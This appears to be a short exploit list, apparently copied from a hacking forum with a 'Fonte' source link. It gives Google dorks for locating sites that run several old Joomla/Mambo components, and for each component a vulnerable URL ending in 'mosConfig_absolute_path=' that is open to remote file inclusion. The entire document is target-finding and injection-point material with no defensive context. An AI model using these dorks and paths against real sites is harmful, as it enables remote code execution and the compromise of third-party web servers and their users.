administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_mambatstaff\"
CODE:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
-----------------------------------------------------------------------
Google dork:
inurl:\"com_securityimages\"
CODE:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
CODE:
/components/com_securityimages/lang.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_artlinks\"
CODE:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
-------------------------------------------------------------------- 
Google dork:

inurl:\"com_galleria\"
CODE:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=

Fonte:
goo.gl/cVZve